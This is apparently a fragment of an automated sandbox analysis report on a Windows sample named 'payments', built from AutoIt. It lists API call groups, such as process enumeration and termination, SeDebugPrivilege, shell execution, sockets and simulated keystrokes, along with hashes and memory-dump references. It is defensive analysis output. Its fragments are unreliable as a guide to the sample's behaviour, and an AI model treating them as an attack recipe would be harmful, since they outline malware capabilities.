                                                                                                                          • Instruction Fuzzy Hash: 4AD1BD31604301DFCB14EF24C891A6EBBE1BF89324F14856DF9999B2A2DB31ED41DB52
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CD6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CD5FA6,?), ref: 00CD6ED8
                                                                                                                            • Part of subcall function 00CD6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CD5FA6,?), ref: 00CD6EF1
                                                                                                                            • Part of subcall function 00CD72CB: GetFileAttributesW.KERNEL32(?,00CD6019), ref: 00CD72CC
                                                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00CD75CA
                                                                                                                          • _wcscmp.LIBCMT ref: 00CD75E2
                                                                                                                          • MoveFileW.KERNEL32(?,?), ref: 00CD75FB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 793581249-0
                                                                                                                          • Opcode ID: 716b8b0de95c8414ef16979d97e2acb15972d87796f860e564b597797938bce2
                                                                                                                          • Instruction ID: f1ec114d6db6b6ee45d654e1ddb6a86c1a1adfccf453a63520c9d2da32bb957d
                                                                                                                          • Opcode Fuzzy Hash: 716b8b0de95c8414ef16979d97e2acb15972d87796f860e564b597797938bce2
                                                                                                                          • Instruction Fuzzy Hash: 655111B2A092299ADF51EB94D8819DE73BC9F08310F1045ABFA05E3641FB74D7C9CB64
APIs
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00D0DAD1,00000004,00000000,00000000), ref: 00CAEAEB
• ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00D0DAD1,00000004,00000000,00000000), ref: 00CAEB32
• ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00D0DAD1,00000004,00000000,00000000), ref: 00D0DC86
• ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00D0DAD1,00000004,00000000,00000000), ref: 00D0DCF2
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: d050dd0923b960ba269f08e4bc2d4304a95a1c174e9c85b7509613c415f4bef8
• Instruction ID: d1dc33e490a97b665bc47a3c223ec31cc25fb1305339f6334856090f6b009a6d
• Instruction Fuzzy Hash: E8412C70205382ABD7355729AD8DB7A7A97AB47308F19440EE05B826A1C770BC40D77D
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00CCAEF1,00000B00,?,?), ref: 00CCB26C
• HeapAlloc.KERNEL32(00000000,?,00CCAEF1,00000B00,?,?), ref: 00CCB273
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00CCAEF1,00000B00,?,?), ref: 00CCB288
• GetCurrentProcess.KERNEL32(?,00000000,?,00CCAEF1,00000B00,?,?), ref: 00CCB290
• DuplicateHandle.KERNEL32(00000000,?,00CCAEF1,00000B00,?,?), ref: 00CCB293
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00CCAEF1,00000B00,?,?), ref: 00CCB2A3
• GetCurrentProcess.KERNEL32(00CCAEF1,00000000,?,00CCAEF1,00000B00,?,?), ref: 00CCB2AB
• DuplicateHandle.KERNEL32(00000000,?,00CCAEF1,00000B00,?,?), ref: 00CCB2AE
• CreateThread.KERNEL32(00000000,00000000,00CCB2D4,00000000,00000000,00000000), ref: 00CCB2C8
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: fea240ddbb3996132cb0bfb9a8c38ba0bf4c7a2dd8abc8a925c1b89ac31b1784
• Instruction ID: b0eee0aaaf7ba085224c23858dab35f4ffb2076b7137404857b1a1f640769581
• Instruction Fuzzy Hash: F901BBB5240304BFE710ABA5DC49FAB7BADEB88711F018411FA15DB2A1CBB49801CB71
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
• Opcode ID: 6392392e148c3ce546513bf622ddb5934c486b9c4dec7b254fe8d364b611e4f7
• Instruction ID: ffe96a8509b9e4652aea1e259b6b932a75beba3a711f9da02b4e0068312196e5
• Instruction Fuzzy Hash: 6DE1D471A00259AFDF14DFAAC9C5BEE77B5EF48314F148029F915AB280D770AE42DB90
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-625585964
• Opcode ID: 9fb8ff8d956cffdb0dedadfdc851616795a5a2849ce4b19c4176d1dc848b0ecc
• Instruction ID: 9867bae5de6d285a3fcc2c03ae39899e8f075d5c54c063652a57a2cd77cce46c
• Instruction Fuzzy Hash: 4F918B71A04259ABDB24CFA6CC44FAFBBB8EF45710F10815AF515AB284DB709E45CBA0
APIs
  • Part of subcall function 00CAC6F4: _wcscpy.LIBCMT ref: 00CAC717
• _memset.LIBCMT ref: 00CD5438
• GetMenuItemInfoW.USER32(?), ref: 00CD5467
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CD5513
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00CD553D
Similarity
• API ID: ItemMenu$Info$Default_memset_wcscpy
• String ID: (k$(k$0
• API String ID: 4152858687-3685605446
• Opcode ID: 32b6d06c9860f8c3a74794fb7c85ad55cab0a39ed4b9bd2028c41333b13d22a2
• Instruction ID: 2067dd3d4a50afb59c269eb5b96d550fe118ff353984a55d94ab178f6009ae53
• Instruction Fuzzy Hash: 155123716047019BD7169F28D844BBBB7E9AF85350F04062FFAA5D33A0EB60CE44DB52
APIs
  • Part of subcall function 00CD6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00CD6554
  • Part of subcall function 00CD6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00CD6564
  • Part of subcall function 00CD6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00CD65F9
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CF179A
• GetLastError.KERNEL32 ref: 00CF17AD
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CF17D9
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00CF1855
• GetLastError.KERNEL32(00000000), ref: 00CF1860
• CloseHandle.KERNEL32(00000000), ref: 00CF1895
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: e1b79112def4b2da64e1ee5678133945267cad826834b3ee902904849e458d71
• Instruction ID: 1eec269ccf66248edb1e8ede3492878ab157919eedec003b6863ce6f3a18e47b
• Instruction Fuzzy Hash: 0541E071600205AFDB05EF98C995FBDB7A2AF04314F098059FA069F3D2DB799A01DB52
APIs
• ShowWindow.USER32(00D51628,00000000,00D51628,00000000,00000000,00D51628,?,00D0DC5D,00000000,?,00000000,00000000,00000000,?,00D0DAD1,00000004), ref: 00CFE40B
• EnableWindow.USER32(00000000,00000000), ref: 00CFE42F
• ShowWindow.USER32(00D51628,00000000), ref: 00CFE48F
• ShowWindow.USER32(00000000,00000004), ref: 00CFE4A1
• EnableWindow.USER32(00000000,00000001), ref: 00CFE4C5
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00CFE4E8
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID: @U=u
• API String ID: 642888154-2594219639
• Opcode ID: 15b5c61ae4a2dab96105f99d883be42b2dbfb1cbbd50934710ce036e67f9f0c6
• Instruction ID: efbfc8a690e0cf393bbd9229313b3764637fa08bad5208ca4a74aa525456d2ac
• Instruction Fuzzy Hash: D6417431601158EFDB61CF68C499BA47FE1BF05304F1885A9EB698F2B2C731A942DB52
                                                                                                                          APIs
                                                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 00CD58B8
                                                                                                                          Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID: 8fcc0ae852b42ac20d15d2c48e248a1f8a4475d288606d2733f87987b10aa1e2
• Instruction ID: 7e2566aedca96ab2ec310e03d91207897438a2a413959af16d77765ff585c6b8
• Opcode Fuzzy Hash: 8fcc0ae852b42ac20d15d2c48e248a1f8a4475d288606d2733f87987b10aa1e2
• Instruction Fuzzy Hash: B511A535749746BEAB155B999C82DBA67AC9F15324F30403BF611E63C1EBA0AA00A264
APIs
• SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00CDA806
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
• Opcode ID: ae166102cf28a538e56d390aa638ba51fc178f6e4ff45b1b892ca56e778f09b6
• Instruction ID: ca307e4468aa80828ea81a4a367f81226d4d2f99369280719f54e604f68af6e6
• Opcode Fuzzy Hash: ae166102cf28a538e56d390aa638ba51fc178f6e4ff45b1b892ca56e778f09b6
• Instruction Fuzzy Hash: B2C18B75A0021A9FDB00DF98C495BAEB7F5EF09315F20806AE619E7381D734AA41DF91
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00CD6B63
• LoadStringW.USER32(00000000), ref: 00CD6B6A
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CD6B80
• LoadStringW.USER32(00000000), ref: 00CD6B87
• _wprintf.LIBCMT ref: 00CD6BAD
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CD6BCB
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00CD6BA8
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
• Opcode ID: 1843f054c754ea11e459cf77a6599c29427d122ec768a60fa83f417f52cbd099
• Instruction ID: af055aa6d445836ce138fc0ed964bac84f0f87c94ddfec1a510fd1d51129f54e
• Opcode Fuzzy Hash: 1843f054c754ea11e459cf77a6599c29427d122ec768a60fa83f417f52cbd099
• Instruction Fuzzy Hash: C10112F65403587FE711ABA49D89EF6766DD708304F008492B746D2141EA749E859F70
APIs
  • Part of subcall function 00CF3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2BB5,?,?), ref: 00CF3C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF2BF6
Similarity
• API ID: BuffCharConnectRegistryUpper
• String ID:
• API String ID: 2595220575-0
• Opcode ID: e0743381451ef380a42abe3c50fe65114820266ae892736dfa7068b52a4cb929
• Instruction ID: ac7b3658447491775b06f604aeea460209c6ffd8eff56ce139cb239f8c53f40c
• Opcode Fuzzy Hash: e0743381451ef380a42abe3c50fe65114820266ae892736dfa7068b52a4cb929
• Instruction Fuzzy Hash: B1918C71204205AFDB10EF58C895BBEB7E5FF88314F04881DFA96972A1DB34EA05DB42
APIs
• select.WSOCK32 ref: 00CE9691
• WSAGetLastError.WSOCK32(00000000), ref: 00CE969E
• __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00CE96C8
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00CE96E9
• WSAGetLastError.WSOCK32(00000000), ref: 00CE96F8
• htons.WSOCK32(?,?,?,00000000,?), ref: 00CE97AA
• inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00D2DC00), ref: 00CE9765
  • Part of subcall function 00CCD2FF: _strlen.LIBCMT ref: 00CCD309
• _strlen.LIBCMT ref: 00CE9800
Similarity
• API ID: ErrorLast_strlen$htonsinet_ntoaselect
• String ID:
• API String ID: 3480843537-0
• Opcode ID: 2c2768879d4c2a70288bd5b515855aa74bf7df182dd6f6bd31b621ad76082fd7
• Instruction ID: 31757f9525551988bfd2877a637e2233866705ff26ab34579e13cbbe59cf6923
• Opcode Fuzzy Hash: 2c2768879d4c2a70288bd5b515855aa74bf7df182dd6f6bd31b621ad76082fd7
• Instruction Fuzzy Hash: 4481F071504240ABC720EFA5CC85E6BB7E9EF85714F10461DF5569B2E1EB30DD04DBA2
APIs
• __mtinitlocknum.LIBCMT ref: 00CBA991
  • Part of subcall function 00CB7D7C: __FF_MSGBANNER.LIBCMT ref: 00CB7D91
  • Part of subcall function 00CB7D7C: __NMSG_WRITE.LIBCMT ref: 00CB7D98
  • Part of subcall function 00CB7D7C: __malloc_crt.LIBCMT ref: 00CB7DB8
• __lock.LIBCMT ref: 00CBA9A4
• __lock.LIBCMT ref: 00CBA9F0
• InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00D46DE0,00000018,00CC5E7B,?,00000000,00000109), ref: 00CBAA0C
• EnterCriticalSection.KERNEL32(8000000C,00D46DE0,00000018,00CC5E7B,?,00000000,00000109), ref: 00CBAA29
• LeaveCriticalSection.KERNEL32(8000000C), ref: 00CBAA39
Similarity
• API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
• String ID:
• API String ID: 1422805418-0
• Opcode ID: f810a32adc57c66ca31cb002d5b775da3fbce22f206e9f8d6e413af517a27daa
• Instruction ID: 5e284559afc936a479de2a1c09e672bd7e4fe57468c1ca495335cf6cce1bb167
• Opcode Fuzzy Hash: f810a32adc57c66ca31cb002d5b775da3fbce22f206e9f8d6e413af517a27daa
• Instruction Fuzzy Hash: 1F4126719003019BEB109F68CA447D8BBA0BF05325F148318E8B5EB2D1DB749941EFA2
APIs
  • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
  • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
  • Part of subcall function 00CAC6F4: _wcscpy.LIBCMT ref: 00CAC717
• _wcstok.LIBCMT ref: 00CE184E
• _wcscpy.LIBCMT ref: 00CE18DD
• _memset.LIBCMT ref: 00CE1910
Strings
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
• Opcode ID: 4a109dd27b5fcd89c980d5123360b39cbef1a61a62dc2bc62fbb8c172bd38b24
• Instruction ID: 6417c012f97b4a582f8057ad91d2bfebfe7d9c7542ad154d1aaff95038d1b0c6
• Opcode Fuzzy Hash: 4a109dd27b5fcd89c980d5123360b39cbef1a61a62dc2bc62fbb8c172bd38b24
• Instruction Fuzzy Hash: 60C19F316043409FCB24EF64C895AAEB7E4FF85350F04496DF89A972A2DB30ED55DB82
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8160143695c1f91c0fd63addc77ef6a16781a2627daf5e9827582e6a5b5246d0
                                                                                                                          • Instruction ID: 16938914aaca5eecd3a3b6bda172d0922eb706ac4448852084d62072263f6a8b
                                                                                                                          • Opcode Fuzzy Hash: 8160143695c1f91c0fd63addc77ef6a16781a2627daf5e9827582e6a5b5246d0
                                                                                                                          • Instruction Fuzzy Hash: 9F718EB090010AFFCB08CF99CC49AAEBB75FF8A314F148149F915A7251D730AA52CF65
APIs
• _memset.LIBCMT ref: 00CF225A
• _memset.LIBCMT ref: 00CF2323
• ShellExecuteExW.SHELL32(?), ref: 00CF2368
  • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
  • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
  • Part of subcall function 00CAC6F4: _wcscpy.LIBCMT ref: 00CAC717
• CloseHandle.KERNEL32(00000000), ref: 00CF242F
• FreeLibrary.KERNEL32(00000000), ref: 00CF243E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 4082843840-2766056989
• Opcode ID: 2669f5b2f1bd58f0bd20c17988e199647783c1fd2f0ab41b8d5cd1f3d1b16fb2
• Instruction ID: aa3d02117d59fbde91f1d8a257731917fa6f2aae941a8ff6fed757d6a0207ef6
• Opcode Fuzzy Hash: 2669f5b2f1bd58f0bd20c17988e199647783c1fd2f0ab41b8d5cd1f3d1b16fb2
• Instruction Fuzzy Hash: 1A71A1B0A00619DFCF05EFA8C4859AEBBF5FF48310F108459E955AB3A1CB34AE41DB91
APIs
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00CFE1D5
• SendMessageW.USER32(?,000000B0,?,?), ref: 00CFE20D
• IsDlgButtonChecked.USER32(?,00000001), ref: 00CFE248
• GetWindowLongW.USER32(?,000000EC), ref: 00CFE269
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CFE281
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: MessageSend$ButtonCheckedLongWindow
• String ID: @U=u
• API String ID: 3188977179-2594219639
• Opcode ID: 142c20f0169608faed13a2d80906c9614471eb20cc2ef8b2f135c77ebe49856c
• Instruction ID: daedcced043bff7f07c06ba1ba04b17b4e0fcabd50c79bcddcf770467761863e
• Opcode Fuzzy Hash: 142c20f0169608faed13a2d80906c9614471eb20cc2ef8b2f135c77ebe49856c
• Instruction Fuzzy Hash: D9617F38600208AFDB65DF59C855FBE77BAEF49300F148059FA65973B2C771AA40DB12
APIs
• GetParent.USER32(?), ref: 00CD3DE7
• GetKeyboardState.USER32(?), ref: 00CD3DFC
• SetKeyboardState.USER32(?), ref: 00CD3E5D
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00CD3E8B
• PostMessageW.USER32(?,00000101,00000011,?), ref: 00CD3EAA
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00CD3EF0
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00CD3F13
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: b763b1e1b9e926bb9374f446380039a456253a7a9b1bb301b85d0b374bc0cdf9
• Instruction ID: eb8b94980e349d5e73cba3ceb80001c2623c0828e834dddedcf91910e2c0ff22
• Opcode Fuzzy Hash: b763b1e1b9e926bb9374f446380039a456253a7a9b1bb301b85d0b374bc0cdf9
• Instruction Fuzzy Hash: 1A51E5A06047D53DFB3647648C45BBABFA55B06304F08858AE2E586AC2D3A49FC4D762
APIs
• GetParent.USER32(00000000), ref: 00CD3C02
• GetKeyboardState.USER32(?), ref: 00CD3C17
• SetKeyboardState.USER32(?), ref: 00CD3C78
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00CD3CA4
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00CD3CC1
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00CD3D05
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00CD3D26
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 52507b0890ee89139be7b2e377e74a8353c92f9302e62ba0780cf9db54d40b76
• Instruction ID: 1697434bc00a1c4090f6f27d0bc46b76ca4fa11a66fc7766decdb3ccd3d6cd01
• Opcode Fuzzy Hash: 52507b0890ee89139be7b2e377e74a8353c92f9302e62ba0780cf9db54d40b76
• Instruction Fuzzy Hash: 5B516DA05147D53DFB3243348C45BBABF9A5B46300F0C858BE2E5566C2D394EF84EB62
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID:
• String ID: @U=u
• API String ID: 0-2594219639
• Opcode ID: e1955e6aabf7812b0d0fe94fc6e31f79fed308751fa8e58e8a5cfe64a5885338
• Instruction ID: 7a0fdff41792a6c962b20705d2f5308d6f4dbfbc11d9ed9cff79be81ef5a8781
• Opcode Fuzzy Hash: e1955e6aabf7812b0d0fe94fc6e31f79fed308751fa8e58e8a5cfe64a5885338
• Instruction Fuzzy Hash: 3741C339A0021CBBCB54DF68CDC4FB9BB69EB09310F154125EA69E72D1C730AE11DA61
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD08F2
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD0918
• SysAllocString.OLEAUT32(00000000), ref: 00CD091B
• SysAllocString.OLEAUT32(?), ref: 00CD0939
• SysFreeString.OLEAUT32(?), ref: 00CD0942
• StringFromGUID2.OLE32(?,?,00000028), ref: 00CD0967
• SysAllocString.OLEAUT32(?), ref: 00CD0975
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 9097556d55493c2bce48809fca296c81845d516e9d01537267d8ccda0ca190c1
• Instruction ID: ecebdcfe245b1ec17434abe8429629d1f17ccbf00606573145f6de743cfb8764
• Opcode Fuzzy Hash: 9097556d55493c2bce48809fca296c81845d516e9d01537267d8ccda0ca190c1
• Instruction Fuzzy Hash: 24217476601219BF9B109BACDC84EEB73ACEB09360B108126FA15DB355DA70ED46C764
APIs
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00CCB88E
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00CCB8A1
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00CCB8D1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_payments.jbxd
Similarity
• API ID: MessageSend
• String ID: @U=u$ComboBox$ListBox
• API String ID: 3850602802-2258501812
• Opcode ID: cde2fc5d934d7880b600403100c572bbe1158174f209c39449bcbf4a34a352f2
• Instruction ID: db00bd9877d9a7d962572c9978e6623eb817952fc12670b54a123c620a1265df
• Opcode Fuzzy Hash: cde2fc5d934d7880b600403100c572bbe1158174f209c39449bcbf4a34a352f2
• Instruction Fuzzy Hash: F521BF76900208BFDB04ABA4D88BEFEB77DDF45354F10412DF422A61E1DB744E0AAB60
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __wcsnicmp
                                                                                                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                          • API String ID: 1038674560-2734436370
                                                                                                                          • Opcode ID: 965c2fa66d6556eff112153e99bbf1eeb57a250142e387bfe9b76f7a115979e6
                                                                                                                          • Instruction ID: 2d5fafa1d48f3a639efba23733a4e44bf9215717e725986fbf9c528b3ae868c8
                                                                                                                          • Opcode Fuzzy Hash: 965c2fa66d6556eff112153e99bbf1eeb57a250142e387bfe9b76f7a115979e6
                                                                                                                          • Instruction Fuzzy Hash: 7A216E3110462177C321AA35EC12FB77398EF75304F64402FFA5597281F7659E42E3A5
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD09CB
